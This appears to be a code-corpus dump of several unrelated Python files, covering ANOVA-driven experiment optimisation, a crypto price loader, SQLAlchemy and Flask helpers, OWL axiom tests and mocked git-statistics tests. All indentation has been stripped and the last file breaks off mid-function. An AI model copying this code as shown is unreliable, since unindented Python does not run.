def start_factorial_tests(wf):
experiment_id = wf.id
key = wf.analysis["data_type"]
# key = "overhead"
if key is not None:
try:
stage_ids, samples, knobs = get_tuples(experiment_id=experiment_id, step_no=wf.step_no, key=key)
test = FactorialAnova(stage_ids=stage_ids, y_key=key, knob_keys=None, stages_count=len(stage_ids))
aov_table, aov_table_sqr = test.run(data=samples, knobs=knobs)
# before saving and merging tables, extract useful information
aov_table = delete_combination_notation(aov_table)
aov_table_sqr = delete_combination_notation(aov_table_sqr)
# type(dd) is DefaultOrderedDict
# keys = [exploration_percentage, route_random_sigma, exploration_percentage,route_random_sigma...]
# resultDict e.g. {'PR(>F)': 0.0949496951695454, 'F': 2.8232330924997346 ...
dod = iterate_anova_tables(aov_table=aov_table, aov_table_sqr=aov_table_sqr)
# from now on, caller functions should fetch result from DB
db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test.name, anova_result=dod, knobs=knobs)
return True
except Exception as e:
print("error in factorial tests, while performing anova")
tb = traceback.format_exc()
error(tb)
return False
else:
error("data type for anova is not properly provided")
return False
def get_tuples(experiment_id, step_no, key):
stage_ids = db().get_stages(experiment_id, step_no)[0]
data, knobs = db().get_data_for_analysis(experiment_id, step_no)
extract_inner_values(key=key, stage_ids=stage_ids, data=data)
# parse data & knobs (k-v pairs) to a proper array of values
samples = [data[stage_id] for stage_id in stage_ids]
knobs = [knobs[stage_id] for stage_id in stage_ids]
return stage_ids, samples, knobs
def extract_inner_values(key, stage_ids, data):
for stage_id in stage_ids:
res = []
# AnalysisTest.data is a dict of stage_ids and data_points
for data_point in data[stage_id]:
if key in data_point[outer_key]:
res.append(data_point[outer_key][key])
data[stage_id] = res
# type(table) is DataFrame
# rows are keys of the result obj param1; param2; param1, param2 etc.
# values are inner keys of those keys, type of values is dict
# set NaN or nan values to None to save to DB properly
# they are like (nan, <type 'float'>), so we compare them by str
def iterate_anova_tables(aov_table, aov_table_sqr):
dd = DefaultOrderedDict(OrderedDict)
# iterate first table
for row in aov_table.itertuples():
for col_name in list(aov_table):
if col_name == "PR(>F)" and hasattr(row, "_4"): # PR(>F) is translated to _4 because of pandas?
val = getattr(row, "_4")
if str(val) == 'nan' or str(val) == 'NaN':
val = None
dd[row.Index][col_name] = val
elif hasattr(row, col_name):
val = getattr(row, col_name)
if str(val) == 'nan' or str(val) == 'NaN':
val = None
dd[row.Index][col_name] = val
# iterate second table
for row in aov_table_sqr.itertuples():
for col_name in list(aov_table_sqr):
if hasattr(row, col_name):
val = getattr(row, col_name)
if str(val) == 'nan' or str(val) == 'NaN':
val = None
dd[row.Index][col_name] = val
return dd
# https://stackoverflow.com/questions/4406501/change-the-name-of-a-key-in-dictionary
# https://stackoverflow.com/questions/40855900/pandas-rename-index-values
def delete_combination_notation(table):
for r in table.index:
corrected = []
keys = str(r).split(':')
for k in keys:
k = str(k).replace('C(', '').replace(')', '')
corrected.append(k)
if len(corrected) != 0:
res = ""
for idx, k in enumerate(corrected):
res += k
if idx != len(corrected) - 1:
res += ", "
table = table.rename(index={r: res})
return table
# https://stackoverflow.com/questions/16412563/python-sorting-dictionary-of-dictionaries
def get_significant_interactions(anova_result, alpha, nrOfParameters):
# now we want to select the most important factors out of result
significant_interactions = []
for interaction_key in anova_result.keys():
res = anova_result[interaction_key]
# Residual will be filtered here because of None check
if 'PR(>F)' in res:
pvalue = res['PR(>F)']
if pvalue < alpha and pvalue is not None:
significant_interactions.append((interaction_key, res, pvalue))
# sort w.r.t pvalue and also pass other values to caller fcn
sorted_significant_interactions = sorted((pvalue, interaction_key, res) for (interaction_key, res, pvalue) in significant_interactions)
if sorted_significant_interactions:
dd = DefaultOrderedDict(OrderedDict)
# Filtering phase
idx = 0
for (pvalue, interaction_key, res) in sorted_significant_interactions:
if idx < nrOfParameters:
# TODO: mark the selected ones in DB, for UI to use this properly, update_analysis method should be changed
# for now, we'll re-iterate tuples and mark them in UI
res["is_selected"] = True
dd[interaction_key] = res
idx += 1
return dd
return None
''' distributes number of iterations within optimization to respective significant interactions
e.g. nrOfFoundInteractions = 10, and we have 3 influencing factors; then
4 will be assigned to first (most) influencing factor, 3 will be assigned to second & third factor
as we use DefaultOrderedDict, we preserve the insertion order of tuples and we get keys based on index of values
'''
def assign_iterations(experiment, significant_interactions, execution_strategy_type):
nrOfFoundInteractions = len(significant_interactions.keys())
optimizer_iterations = experiment["executionStrategy"]["optimizer_iterations"]
values = []
# https://stackoverflow.com/questions/10366327/dividing-a-integer-equally-in-x-parts
for i in range(nrOfFoundInteractions):
values.append(optimizer_iterations / nrOfFoundInteractions) # integer division
# divide up the remainder
for i in range(optimizer_iterations % nrOfFoundInteractions):
values[i] += 1
# here, values = [4, 3, 3] for nrOfFoundInteractions = 3, optimizer_iterations = 10
# keys = ['route_random_sigma', 'exploration_percentage', 'route_random_sigma, exploration_percentage']
info("> values " + str(values))
for i in range(len(values)):
key = significant_interactions.keys()[i]
# TODO: set UI so that smaller value cannot be retrieved,
# if you have more values in keys, then you need to set opt_iter_in_design accordingly
# the restriction of n_calls <= 4 * nrOfParams is coming from gp_minimize
# TODO: depending on execution_strategy_type, different values can be assigned
if values[i] < len(str(key).split(', ')) * 4:
values[i] = len(str(key).split(', ')) * 4
significant_interactions[key]["optimizer_iterations"] = values[i]
significant_interactions[key]["optimizer_iterations_in_design"] = len(str(key).split(', ')) * 4
info("> Significant Interactions " + str(significant_interactions))
return significant_interactions
def start_bogp(wf, sorted_significant_interactions):
execution_strategy_type = wf.execution_strategy["type"]
assigned_iterations = assign_iterations(wf._oeda_experiment, sorted_significant_interactions, execution_strategy_type)
newExecutionStrategy = deepcopy(wf._oeda_experiment["executionStrategy"])
# print(newExecutionStrategy)
knobs = newExecutionStrategy["knobs"]
# k, v example: "route_random_sigma, exploration_percentage": {"optimizer_iterations": 3,"PR(>F)": 0.13678788369818956, "optimizer_iterations_in_design": 8 ...}
# after changing knobs parameter of experiment.executionStrategy, perform experimentation for each interaction (v)
optimal_tuples = []
optimizer_run = 1 # to create step_name to be passed to oedaCallback
for k, v in sorted_significant_interactions.items():
print("k: ", k, " v: ", v)
# here chVars are {u'route_random_sigma': [0, 0.4], u'exploration_percentage': [0, 0.4, 0.6]}
# print(experiment["changeableVariables"])
# if there is only one x value in key, then fetch min & max values from chVars after sorting them because user can provide unsorted values in UI
new_knob = {}
params = str(k).split(', ')
# convert values to float because their original type is unicode and skicit gives error about it
if len(params) == 1:
knobs[k] = sorted(knobs[k])
min_value = knobs[k][0]
max_value = knobs[k][-1]
new_knob[str(k)] = [float(min_value), float(max_value)]
else:
for parameter in params:
all_values = knobs[parameter] # user can provide different values [0, 0.2, 0.4], [0, 0.4, 0.2] etc.
all_values = sorted(all_values)
new_knob[parameter] = [float(all_values[0]), float(all_values[-1])]
# prepare everything needed for experimentation
# fetch optimizer_iterations and optimizer_iterations_in_design from assigned_iterations
newExecutionStrategy["knobs"] = new_knob
newExecutionStrategy["optimizer_iterations"] = assigned_iterations[k]["optimizer_iterations"]
newExecutionStrategy["optimizer_iterations_in_design"] = assigned_iterations[k]["optimizer_iterations_in_design"]
# set new values in wf
wf.execution_strategy = newExecutionStrategy
wf.step_name = "Bayesian Optimization - Run: " + str(optimizer_run)
# perform desired optimization process
# after each experimentation, we will get best value & knob related with that value
# to find optimum out of all experiments, we use optimal_tuples array to keep track & sort at the end
# also save this optimum as stage_result and distinguish between regular stage & overall stage (final) result
stage_no = "best"
if wf.execution_strategy["type"] == 'self_optimizer':
optimal_knob, optimal_result = start_self_optimizer_strategy(wf)
optimal_tuples.append((optimal_knob, optimal_result))
info("> Saving optimal knob at the end of Bayesian process (scikit): " + str(optimal_knob) + ", " + str(optimal_result))
db().save_stage(experiment_id=wf.id, step_no=wf.step_no, step_name=wf.step_name, stage_no=stage_no, knobs=optimal_knob, stage_result=optimal_result)
elif wf.execution_strategy["type"] == 'mlr_mbo':
optimal_knob, optimal_result = start_mlr_mbo_strategy(wf)
optimal_tuples.append((optimal_knob, optimal_result))
db().save_stage(experiment_id=wf.id, step_no=wf.step_no, step_name=wf.step_name, stage_no=stage_no, knobs=optimal_knob, stage_result=optimal_result)
info("> Saving optimal knob at the end of Bayesian process (mlr-mbo): " + str(optimal_knob) + ", " + str(optimal_result))
optimizer_run += 1
# increment step_no by one as we treat each run of optimization as one step
wf.step_no += 1
# also reset stage_counter
wf.stage_counter = 1
wf.resetExperimentCounter(wf)
# also update experiment's numberOfSteps
db().update_experiment(experiment_id=wf.id, field='numberOfSteps', value=wf.step_no)
intermediate_tuples = sorted(optimal_tuples, key=lambda x: x[1])
info("> Intermediate_tuples & values " + str(intermediate_tuples))
intermediate_knobs = intermediate_tuples[0][0]
info("> intermediate_knobs " + str(intermediate_knobs))
# find best configuration for intermediate runs and apply it on target system (if applicable)
if wf.change_provider["changesApplicable"]:
info("> applying changes using intermediate_knobs " + str(intermediate_knobs))
wf.change_provider["instance"].applyChange(intermediate_knobs)
info("> All knobs & values " + str(optimal_tuples))
# find the best tuple (knob & result) for overall execution
sorted_tuples = sorted(optimal_tuples, key=lambda x: x[1])
info("> Sorted knobs & values " + str(sorted_tuples))
# e.g. ({'route_random_sigma': 0.3, 'exploration_percentage': 0.5}), 0.4444444
info("> sorted_tuples[0][0] " + str(sorted_tuples[0][0]) + " " + str(sorted_tuples[0][1]))
return sorted_tuples[0][0], sorted_tuples[0][1]
| StarcoderdataPython |
4834118 | import json
import numpy as np
from datetime import datetime
import pandas as pd
from matplotlib import pyplot as plt
from pandas.plotting import register_matplotlib_converters
from .abstract_data_loading_strategy import dataLoadingStrat
class fileLoadingRaw(dataLoadingStrat):
"""
concrete data loading strategy used for dataLoader class.
Designed to load raw data stored from CryptoCompare api that as been
stored in json format
Initialisation / construction:
- infile: desired json file to load. json file has
been saved using the related webLoading
class, that is file is of format:
{ "asset": [
{
"time": 1552147200,
"close": 3937.14,
"high": 3975.25,
"low": 3933.41,
"open": 3956.05,
"volumefrom": 2041.4,
"volumeto": 8097477.69
},
...
],
...
}
- symbols: list of symbols corresponding to data in
infile.
- ticksize: interval of datapoints in infile.
"minute", "hour" or "day".
- outfile: optional outfile to save df.
"""
def __init__(self, infile, symbols, ticksize, outfile=False):
if infile.endswith('.json'):
self._infile = infile
else:
raise ValueError("Infile must be json format")
if all(isinstance(symbol, str) for symbol in symbols):
self._symbols = symbols
else:
raise ValueError("Symbols must be list of string types")
if ticksize == "hour":
self._freq = '1H'
elif ticksize == "day":
self._freq = '1D'
elif ticksize == 'minute':
self._freq = '1T'
else:
raise ValueError("Incompatible ticksize")
self._ticksize = ticksize
if outfile and not outfile.endswith('.csv'):
raise ValueError("outfile must be csv type")
self._outfile = outfile
def get_data(self):
"""
Loads close prices of all assets in self._symbols for ticksize
self._freq from raw data in self._infile by computing several
steps:
1. First checks all data and get the earliest and latest
timestamps
2. Creates a pandas dataframe which stores a list of datetimes
as an index from earliest timestamp to latest timestamp in steps
of self._ticksize.
3. Then pulls associated close prices from raw json file and
stores in dataframe.
Outputs:
- df: (pandas DataFrame) holds close prices of all
assets in self._symbols along with
associated datetimes as index
Notes:
- If there is no close prices associated with a given date,
function takes price from associated w/ previous time.
- This function is reasonably ineffcient as iterates over the
dataset twice. First to determine times and second to get data
"""
with open(self._infile) as json_file:
raw_data = json.load(json_file)
now = datetime.now()
earliest_timestamp = (now - datetime(1970, 1, 1)).total_seconds()
latest_timestamp = 0
# determine the longest series in file to build dataframe
for symbol in self._symbols:
asset = raw_data[symbol]
for i in range(len(asset)):
if asset[i]['time'] < earliest_timestamp:
earliest_timestamp = asset[i]['time']
if asset[i]['time'] > latest_timestamp:
latest_timestamp = asset[i]['time']
# set up dataframe
start_date = datetime.fromtimestamp(earliest_timestamp)
end_date = datetime.fromtimestamp(latest_timestamp)
times = pd.date_range(start=start_date, end=end_date, freq=self._freq)
df = pd.DataFrame({'date': times})
df = df.set_index('date')
for symbol in self._symbols:
print(symbol)
df[symbol] = 0.0 # initilise asset row in df
asset_data = raw_data[symbol]
close_times = ([datetime.fromtimestamp(item['time'])
for item in asset_data])
if(self._ticksize == "day"):
close_times = [time.date() for time in close_times]
close_prices = [item["close"] for item in asset_data]
# Store data in dataframe
# -----------------------------------------------------------------
for i in range(df.shape[0]):
date = df.index[i]
if self._ticksize == "day":
date = date.date()
try:
index = close_times.index(date)
df[symbol][i] = close_prices[index]
except ValueError:
# if no data at date, assume the previous date's data
if i > 0:
df[symbol][i] = df[symbol][i-1]
# -----------------------------------------------------------------
if self._outfile:
df.to_csv(self._outfile)
return df
class fileLoadingDF(dataLoadingStrat):
"""
Concrete data loading strategy for the data loading class.
Reads data stored in a pandas DataFrame.
Initialisation:
- infile: (str) file name of csv file containing data
"""
def __init__(self, infile):
if infile.endswith('.csv'):
self._infile = infile
else:
raise ValueError("infile must be csv format")
def get_data(self):
df = pd.read_csv(self._infile)
if 'Unnamed: 0' in df.keys():
df = df.drop(columns=['Unnamed: 0']) # Drop index column
return df
| StarcoderdataPython |
8039005 | from datetime import datetime, timezone
import sqlalchemy.types
class DateTime(sqlalchemy.types.TypeDecorator):
"""
Custom DateTime, to make sure we always have aware datetime instances
at the python side, and always store timestamps in the database in UTC.
This is necessary, as MariaDB, contrary to PostgreSQL, does not support
storing the timestamp *including* the timezone, in the database.
"""
impl = sqlalchemy.types.DateTime
def process_bind_param(self, value: datetime, dialect) -> datetime:
if value is not None:
if not value.tzinfo:
raise TypeError("tzinfo is required")
value = value.astimezone(timezone.utc).replace(tzinfo=None)
return value
def process_result_value(self, value: datetime, dialect) -> datetime:
if value is not None:
assert not value.tzinfo
value = value.replace(tzinfo=timezone.utc)
return value
| StarcoderdataPython |
11383883 | <reponame>allaparthi/monorail
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import sys
# pylint: disable=line-too-long
d = json.load(sys.stdin)
if not d['issue_url']:
print >> sys.stderr, "Failed to get Gerrit CL associated with this repo."
print >> sys.stderr, "Ensure that you've run `git cl upload` before using run_remotely.sh"
sys.exit(1)
print d['issue_url']
| StarcoderdataPython |
8016600 | <reponame>APPFL/APPFL
import os
import time
import json
import torch
from appfl.config import *
from appfl.misc.data import *
from models.cnn import *
import appfl.run_serial as rs
import appfl.run_mpi as rm
from mpi4py import MPI
DataSet_name = "Coronahack"
num_clients = 4
num_channel = 3 # 1 if gray, 3 if color
num_classes = 7 # number of the image classes
num_pixel = 32 # image size = (num_pixel, num_pixel)
dir = os.getcwd() + "/datasets/PreprocessedData/%s_Clients_%s" % (
DataSet_name,
num_clients,
)
def get_data(comm: MPI.Comm):
# test data for a server
with open("%s/all_test_data.json" % (dir)) as f:
test_data_raw = json.load(f)
test_dataset = Dataset(
torch.FloatTensor(test_data_raw["x"]), torch.tensor(test_data_raw["y"])
)
# training data for multiple clients
train_datasets = []
for client in range(num_clients):
with open("%s/all_train_data_client_%s.json" % (dir, client)) as f:
train_data_raw = json.load(f)
train_datasets.append(
Dataset(
torch.FloatTensor(train_data_raw["x"]),
torch.tensor(train_data_raw["y"]),
)
)
data_sanity_check(train_datasets, test_dataset, num_channel, num_pixel)
return train_datasets, test_dataset
def get_model(comm: MPI.Comm):
## User-defined model
model = CNN(num_channel, num_classes, num_pixel)
return model
def main():
comm = MPI.COMM_WORLD
comm_rank = comm.Get_rank()
comm_size = comm.Get_size()
## Reproducibility
torch.manual_seed(1)
torch.backends.cudnn.deterministic = True
start_time = time.time()
train_datasets, test_dataset = get_data(comm)
model = get_model(comm)
print(
"----------Loaded Datasets and Model----------Elapsed Time=",
time.time() - start_time,
)
# read default configuration
cfg = OmegaConf.structured(Config)
if comm_size > 1:
if comm_rank == 0:
rm.run_server(cfg, comm, model, num_clients, test_dataset, DataSet_name)
else:
rm.run_client(cfg, comm, model, num_clients, train_datasets)
print("------DONE------", comm_rank)
else:
rs.run_serial(cfg, model, train_datasets, test_dataset, DataSet_name)
if __name__ == "__main__":
main()
# To run CUDA-aware MPI:
# mpiexec -np 5 --mca opal_cuda_support 1 python ./coronahack.py
# To run MPI:
# mpiexec -np 5 python ./coronahack.py
# To run:
# python ./coronahack.py
| StarcoderdataPython |
1786880 | <gh_stars>10-100
import typing
Flake8Error = typing.NamedTuple(
'Flake8Error', [
('line_number', int),
('offset', int),
('text', str),
('checker_cls', type),
]
)
AAAError = typing.NamedTuple('AAAError', [
('line_number', int),
('offset', int),
('text', str),
])
class Flake8AAAException(Exception):
pass
class TokensNotLoaded(Flake8AAAException):
"""
`Checker.all_funcs()` was called before `ast_tokens` was populated. Usually
this is done by `Checker.load()`.
"""
class EmptyBlock(Flake8AAAException):
"""
Block has no nodes.
"""
class ValidationError(Flake8AAAException):
"""
Attributes:
line_number (int)
offset (int)
text (str)
"""
def __init__(self, line_number, offset, text):
self.line_number = line_number
self.offset = offset
self.text = text
def to_flake8(self, checker_cls: type) -> Flake8Error:
"""
Args:
checker_cls: Class performing the check to be passed back to
flake8.
"""
return Flake8Error(
line_number=self.line_number,
offset=self.offset,
text=self.text,
checker_cls=checker_cls,
)
def to_aaa(self) -> AAAError:
return AAAError(
line_number=self.line_number,
offset=self.offset,
text=self.text,
)
| StarcoderdataPython |
116939 | import unittest
from rdflib import RDFS, Namespace
from funowl.annotations import Annotation
from funowl.class_axioms import SubClassOf, EquivalentClasses, DisjointClasses, DisjointUnion, HasKey
from funowl.class_expressions import ObjectIntersectionOf, ObjectSomeValuesFrom, ObjectUnionOf
from funowl.dataproperty_expressions import DataPropertyExpression
from funowl.objectproperty_expressions import ObjectPropertyExpression
from funowl.writers.FunctionalWriter import FunctionalWriter
from tests.utils.base import TestBase
SCT = Namespace("http://snomed.info/id/")
class ClassAxiomsTestCase(TestBase):
def setUp(self) -> None:
self.sw = FunctionalWriter()
self.sw.bind(None, SCT)
def test_equivalentclasses(self):
self.assertEqual("""EquivalentClasses(
:303394007
:45189000
:609096000
)""", str(EquivalentClasses(SCT['303394007'], SCT['45189000'], SCT['609096000']).to_functional(self.sw)))
with self.assertRaises(ValueError, msg="at least 2 arguments are required"):
str(EquivalentClasses( SCT['303394007']).to_functional(self.sw))
# Taken from SNOMED CT
self.assertEqual("""EquivalentClasses(
:303394007
ObjectIntersectionOf(
:45189000
ObjectSomeValuesFrom( :609096000 ObjectIntersectionOf(
ObjectSomeValuesFrom( :260686004 :129397003 )
ObjectSomeValuesFrom( :363700003 :52988006 )
ObjectSomeValuesFrom( :405813007 :69695003 )
) )
)
)""", str(EquivalentClasses(
SCT['303394007'],
ObjectIntersectionOf(
SCT['45189000'],
ObjectSomeValuesFrom(
SCT['609096000'],
ObjectIntersectionOf(
ObjectSomeValuesFrom(SCT['260686004'], SCT['129397003']),
ObjectSomeValuesFrom(SCT['363700003'], SCT['52988006']),
ObjectSomeValuesFrom(SCT['405813007'], SCT['69695003']))))).to_functional(self.sw.reset())))
def test_oio(self):
""" Bug: ObjectIntersectionOf ends up being a single argument to ObjectSomeValuesOf """
self.assertEqual("""ObjectIntersectionOf(
:45189000
ObjectSomeValuesFrom( :609096000 ObjectUnionOf(
:1
:2
) )
)""", str(ObjectIntersectionOf(
SCT['45189000'],
ObjectSomeValuesFrom(
SCT['609096000'],
ObjectUnionOf(
SCT['1'],
SCT['2']))).to_functional(self.sw.reset())))
def test_disjointclasses(self):
self.assertEqual("""DisjointClasses(
:303394007
:45189000
:609096000
)""", str(DisjointClasses(SCT['303394007'], SCT['45189000'], SCT['609096000']).to_functional(self.sw)))
def test_disjointunion(self):
self.assertEqual("""DisjointUnion( :12345
:303394007
:45189000
:609096000
)""", str(DisjointUnion(SCT['12345'], SCT['303394007'], SCT['45189000'], SCT['609096000']).
to_functional(self.sw.reset())))
with self.assertRaises(ValueError, msg="Have to have at least 2 expressions"):
DisjointUnion(SCT['12345'], SCT['303394007']).to_functional(self.sw)
def test_haskey(self):
self.assertEqual('''HasKey( :12345 (
:23456
:23457
) (
:23458
:23459
) )''', str(HasKey(SCT['12345'], ObjectPropertyExpression(SCT['23456']), ObjectPropertyExpression(SCT['23457']),
DataPropertyExpression(SCT['23458']), DataPropertyExpression(SCT['23459'])).to_functional(self.sw.reset())))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
4804858 | from redis_ratelimit.decorators import ratelimit
| StarcoderdataPython |
3201418 | import json
import subprocess
from . import collectors
class CompletedProcessMock:
def __init__(self, stdout='', stderr=''):
self.stdout = stdout
self.stderr = stderr
blame_text = """\
aacd7f517fb0312ec73f882a345d50c6e8512405 1 1 1
author <NAME>
...
filename file.txt
line one
4cbb5a68de251bf42ecfc2b127fd2596c0d17d3f 1 2 1
author <NAME>
...
filename file.txt
line two
""" # flake8: noqa
shortlog_text = """\
1528753992 dcc3c393 M Nasimul Haque
1 file changed, 1 insertion(+), 1 deletion(-)
1528753813 a36e16b3 M Nasimul Haque
1 file changed, 3 insertions(+)
"""
def assert_subprocess_run(cmd):
assert subprocess.run.call_count == 1
subprocess.run.assert_any_call(
f'nice -n 20 {cmd}', cwd='/tmp', check=True, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
def test_clone(mocker):
mocker.patch('subprocess.run')
collectors.clone('/tmp', 'foo', 'bar')
assert_subprocess_run('git clone bar foo')
def test_clone_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
collectors.clone('/tmp', 'foo', 'bar')
assert_subprocess_run('git clone bar foo')
def test_get_timestamp(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('123456')
result = {'timestamp': 123456, 'revision': 'bar'}
assert collectors.get_timestamp('/', 'tmp', 'bar') == result
assert_subprocess_run('git log --pretty=format:"%at" -n 1 bar')
def test_get_blame(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(blame_text)
result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_blame_detect_move(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(blame_text)
result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', True, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -C -C -C -M -w file.txt')
def test_get_blame_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'authors': {}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_branches(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('b1\nb2\nb3 HEAD')
result = {'branches': ['b1', 'b2'], 'repo': 'tmp'}
assert collectors.get_branches('/', 'tmp') == result
assert_subprocess_run('git branch -r')
def test_get_tags(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('123 b1\n456 b2')
result = {
'tags': [
{'revision': '123', 'tag': 'b1'},
{'revision': '456', 'tag': 'b2'},
],
'repo': 'tmp',
}
assert collectors.get_tags('/', 'tmp') == result
assert_subprocess_run('git show-ref --tags')
def test_get_tags_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'repo': 'tmp', 'tags': []}
assert collectors.get_tags('/', 'tmp') == result
assert_subprocess_run('git show-ref --tags')
def test_num_files(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('f1\nf2')
result = {'12345': {'files': 2, 'timestamp': 12345}}
revision = {'revision': '12345', 'timestamp': 12345}
assert collectors.num_files('/', 'tmp', revision) == result
assert_subprocess_run('git ls-tree -r --name-only 12345')
def test_count_lines(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('{"lines": "data from cloc"}')
result = {'data': {'lines': {'lines': 'data from cloc'}}, 'repo': 'tmp'}
assert collectors.count_lines('/', 'tmp') == result
assert_subprocess_run('cloc --vcs git --json')
def test_count_lines_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'data': {'lines': []}, 'repo': 'tmp'}
assert collectors.count_lines('/', 'tmp') == result
assert_subprocess_run('cloc --vcs git --json')
def test_activity(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(shortlog_text)
result = {
'data': {
'authors_age': {
'<NAME>': {
'days': 1,
'first_commit': 1528753813,
'last_commit': 1528753992,
},
},
'by_authors': {
'<NAME>': {
'at_hour': {
'commits': {'22': 2},
'deletions': {'22': 1},
'insertions': {'22': 4},
},
'daily': {
'commits': {'2018-06-11': 2},
'deletions': {'2018-06-11': 1},
'insertions': {'2018-06-11': 4},
},
'monthly': {
'commits': {'2018-06': 2},
'deletions': {'2018-06': 1},
'insertions': {'2018-06': 4},
},
'weekly': {
'commits': {'2018-24': 2},
'deletions': {'2018-24': 1},
'insertions': {'2018-24': 4},
},
'yearly': {
'commits': {'2018': 2},
'deletions': {'2018': 1},
'insertions': {'2018': 4},
},
}
},
'by_time': {
'at_hour': {
'commits': {'22': 2},
'deletions': {'22': 1},
'insertions': {'22': 4},
},
'daily': {
'commits': {'2018-06-11': 2},
'deletions': {'2018-06-11': 1},
'insertions': {'2018-06-11': 4},
},
'monthly': {
'commits': {'2018-06': 2},
'deletions': {'2018-06': 1},
'insertions': {'2018-06': 4},
},
'weekly': {
'commits': {'2018-24': 2},
'deletions': {'2018-24': 1},
'insertions': {'2018-24': 4},
},
'yearly': {
'commits': {'2018': 2},
'deletions': {'2018': 1},
'insertions': {'2018': 4},
},
},
'hour_of_week': {'0': {'22': 2}},
},
'repo': 'tmp',
'revisions': [
{'revision': 'dcc3c393', 'timestamp': 1528753992},
{'revision': 'a36e16b3', 'timestamp': 1528753813},
],
}
assert json.loads(json.dumps(collectors.activity('/', 'tmp'))) == result
assert_subprocess_run('git log --shortstat --pretty=format:"%at %T %aN" HEAD')
def test_summary(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# empty sha generator
CompletedProcessMock('1234'),
# diff --shortstat
CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
# shortlog -s
CompletedProcessMock(' 93 M <NAME>'),
# rev-list --count HEAD
CompletedProcessMock('93'),
# branch -r
CompletedProcessMock('origin/master'),
# log --reverse %at
CompletedProcessMock('1527621944\n1527761990\n1527763244'),
# log %at -n1
CompletedProcessMock('1528755935'),
# show-ref --tags
CompletedProcessMock('refs/tags/v1'),
]
result = {
'data': [
{'key': 'files', 'value': '98'},
{'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
{'key': 'authors', 'value': 1},
{'key': 'commits', 'notes': 'master only', 'value': '93'},
{'key': 'branches', 'value': 1},
{'key': 'tags', 'value': 1},
{'key': 'age', 'notes': 'active days since creation', 'value': 14}],
'repo': 'tmp',
}
assert collectors.summary('/', 'tmp') == result
def test_summary_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# empty sha generator
CompletedProcessMock('1234'),
# diff --shortstat
CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
# shortlog -s
CompletedProcessMock(' 93 <NAME>'),
# rev-list --count HEAD
CompletedProcessMock('93'),
# branch -r
CompletedProcessMock('origin/master'),
# log --reverse %at
CompletedProcessMock('1527621944\n1527761990\n1527763244'),
# log %at -n1
CompletedProcessMock('1528755935'),
# show-ref --tags
Exception('refs/tags/v1'),
]
result = {
'data': [
{'key': 'files', 'value': '98'},
{'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
{'key': 'authors', 'value': 1},
{'key': 'commits', 'notes': 'master only', 'value': '93'},
{'key': 'branches', 'value': 1},
{'key': 'tags', 'value': 0},
{'key': 'age', 'notes': 'active days since creation', 'value': 14}],
'repo': 'tmp',
}
assert collectors.summary('/', 'tmp') == result
def test_update_repo(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# clone
CompletedProcessMock(''),
# pull --tags
CompletedProcessMock(''),
# log --pretty=format:"%H %at %aN" -n1
CompletedProcessMock('head 23456 author'),
# log --reverse --pretty=format:"%at"
CompletedProcessMock('12345'),
]
result = {
'HEAD': 'head',
'author': 'author',
'date': 23456,
'name': 'tmp',
'start_date': 12345,
}
assert collectors.update_repo('/', ['tmp', 'https://example.com']) == result
def test_update_repo_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('')
assert collectors.update_repo('/', ['tmp', 'https://example.com']) == {}
| StarcoderdataPython |
1728791 | from flask import abort, jsonify, session
from app.util import request_helper
from app.services import reddit_service
from app.db.models.raffle import Raffle
from app.db.models.user import User
@request_helper.require_login
def get_user_submissions():
""" Return the user's Reddit submissions that are not already made
into raffles. """
user = User.find_by_jwt(session["jwt"])
if not user:
abort(401)
submissions = reddit_service.get_submissions_for_user(user.get_refresh_token())
if len(submissions) == 0:
return jsonify([])
# Remove submissions that were already made into raffles.
existing_verified_raffle_ids = set(
[r.submission_id for r in Raffle.get_verified_raffles()]
)
filtered_submissions = [
submission
for submission in submissions
if submission["id"] not in existing_verified_raffle_ids
]
return jsonify(filtered_submissions)
def get_user_raffles(username):
""" Returns all the raffles that were created by the given user. """
user = User.query.filter_by(username=username).first()
if not user:
return jsonify({"message": "User not found."}), 404
return jsonify([r.as_dict() for r in user.raffles])
RouteConfigs = [
{"rule": "/submissions", "view_func": get_user_submissions},
{"rule": "/users/<username>/raffles", "view_func": get_user_raffles},
]
| StarcoderdataPython |
188691 | <gh_stars>1-10
class Node:
def __init__(self, data):
self.data = data
self.next = None
self.arb=None
class Solution:
def cloneList(self, head):
clone_head = clone_last = None
current_node = head
while current_node:
if clone_head == None:
clone_head = clone_last = Node(current_node.data)
else:
clone_last.next = Node(current_node.data)
clone_last = clone_last.next
